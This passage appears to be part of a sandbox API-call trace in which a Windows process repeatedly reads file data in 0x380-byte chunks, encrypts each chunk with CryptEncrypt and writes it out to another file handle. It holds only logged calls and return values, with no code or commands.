lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.840] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.840] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.840] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.840] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.840] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.840] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.840] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.841] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.841] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.841] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.841] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.841] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.841] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.841] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.841] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.841] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.841] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.841] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.841] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.841] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.841] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.842] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.842] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.842] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.842] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.842] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.842] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.842] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.842] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.842] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.842] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.842] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.842] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.842] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.843] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.843] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.843] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.843] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.843] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.843] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.843] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.843] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.843] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.843] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.843] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.843] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.843] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.843] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.844] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.844] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.844] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.844] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.844] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.844] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.844] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.844] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.844] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.844] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.844] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.844] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.844] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.844] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.844] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.845] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.845] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.845] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.845] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.845] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.845] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.845] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.845] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.845] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.845] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.845] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.845] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.845] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.846] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.846] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.846] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.846] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.846] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.846] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.846] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.846] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.846] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.846] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.846] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.846] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.846] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.846] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.847] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.847] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.847] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.847] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.847] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.847] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.847] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.847] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 